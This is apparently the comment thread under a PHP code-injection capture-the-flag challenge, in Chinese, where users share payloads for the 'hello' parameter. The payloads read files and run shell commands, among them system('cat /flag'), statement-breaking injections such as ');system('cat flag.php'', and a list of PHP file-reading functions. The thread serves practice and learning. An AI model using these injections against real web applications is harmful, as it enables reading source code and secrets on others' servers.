var_dump(file('flag.php')); file把flag.php读入一个数组中,var_dump输出该数组的类型和长度内容
?hello=file('flag.php')
?hello=file("flag.php")
tnnd我好一个试这个too young too simple,哪个崽崽在此骗人
我也试过
?/hello=system('ls') > ?/hello=system('ls /') > ?/hello=system('cat /flag')
?hello=);system( 'cat flag.php'
index.php?hello=);print_r(file(%22./flag.php%22));//
$flag='Too Young Too Simple'
php
读取文件内容的函数: * show_source * highlight_file * file * file_get_contents + 查看源码(如果为php文件的话) * system('cat ***’) + 查看源码(如果为php文件的话) * system('more ***’) + 查看源码(如果为php文件的话) * system(’tac ***’) 逆序输出
...
评论
Muggle@前进四 2年前
举报
var_dump(file('flag.php')); file把flag.php读入一个数组中,var_dump输出该数组的类型和长度内容
ddddjxyyds 2年前
举报
?hello=file('flag.php')
书山 2年前
举报
?hello=file("flag.php")
凤嘤嘤 2年前
举报
tnnd我好一个试这个too young too simple,哪个崽崽在此骗人
PPEEDD 2年前
举报
我也试过
18978702415 2年前
举报
?/hello=system('ls') > ?/hello=system('ls /') > ?/hello=system('cat /flag')
shiusec 2年前
举报
?hello=);system( 'cat flag.php'
YuJian~ 2年前
举报
index.php?hello=);print_r(file(%22./flag.php%22));//
zztaoe 2年前
举报
$flag='Too Young Too Simple'
Cassaundra 3年前
举报
php
Fitz_临风 3年前
举报
读取文件内容的函数: * show_source * highlight_file * file * file_get_contents + 查看源码(如果为php文件的话) * system('cat ***’) + 查看源码(如果为php文件的话) * system('more ***’) + 查看源码(如果为php文件的话) * system(’tac ***’) 逆序输出